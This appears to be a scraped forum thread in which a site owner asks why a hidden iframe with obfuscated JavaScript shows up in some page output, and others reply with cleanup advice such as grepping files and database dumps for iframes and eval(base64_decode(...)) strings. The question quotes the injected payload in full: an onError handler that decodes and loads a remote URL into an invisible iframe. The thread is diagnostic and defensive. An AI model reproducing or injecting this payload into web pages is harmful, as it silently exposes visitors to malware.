Help with odd PHP javascript/hidden iframe hack

Some pages on my site are including an unintended hidden iframe with some javascript in their output. I have read about sites getting hacked and similar code being added to php and html files before, but that is not quite the problem here, as none of my files actually contain the content that ends up in the output. I have no idea how this is happening. Is there some global php code that executes with each page load, or could it be at apache level? I'm at a loss.

Here is an example of what I'm seeing in the output:

<开发者_开发问答;div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="7867" height="1" width="1"><img src="about:blank" onError='bvnnho=unescape("%27");fyvdmn=eval("document.getElementById("+bvnnho+"npelmp"+bvnnho+").src=unescape("+bvnnho+"%68%74%74%70%3A%2F%2F"+bvnnho+")+document.getElementById("+bvnnho+"7867"+bvnnho+").id+unescape("+bvnnho+"%2E%69%6E%2F"+bvnnho+")+"+bvnnho+"1299250012"+bvnnho+"+unescape("+bvnnho+"%2E%70%68%70"+bvnnho+")");document.getElementById("npelmp").src=fyvdmn' style="width:300;height:300;border:0px;"><iframe id="npelmp" src="about:blank"></iframe></div>

I have gone over my script very carefully and do not see how it could be outputting this. The reason I noticed it is that my script is used for writing a csv file, and an iframe--even hidden--sticks out like a sore-thumb in a csv file. My web host says they haven't gotten any complaints from other users, so it must be my problem.

I have checked all my code (by hand and compared to my local copy), and I went through my database (which only contains integers anyway). I have found no sign of where this is coming from.

Oh, the other bit that makes this so hard to track down is that it is not present every time. So when I try to show the host support, it wasn't there.

Has anyone seen this before. Or any idea of where else I can look?

Thanks...

If you have ssh access, you may just run

grep iframe ./ -Ri

(hint, hackers usually use hidden directories, named " " or stuff like that, that's probably why don't find it)

If it fails, try to search the db, either with phpmyadmin or dumping the raw content to a file and grepping it the usual manner

mysqldump -uUSERID -pPASSWORD DATABASENAME > mydump.sql
grep iframe mydump -i

This is quite common.

Search all files for a string that looks like:

<?php eval(base64_decode("ZnVuY3Rpb24g...

This code might be in header.php file or some other .php file.

Please post back here with what you find.

I realize this is an old post but for readers with same/similar probs try scan your site with http://sitecheck.sucuri.net/scanner/

Or use the following script. http://www.php-beginners.com/solve-wordpress-malware-script-attack-fix.html (although it is word wordpress it also works on other websites)

Good Luck!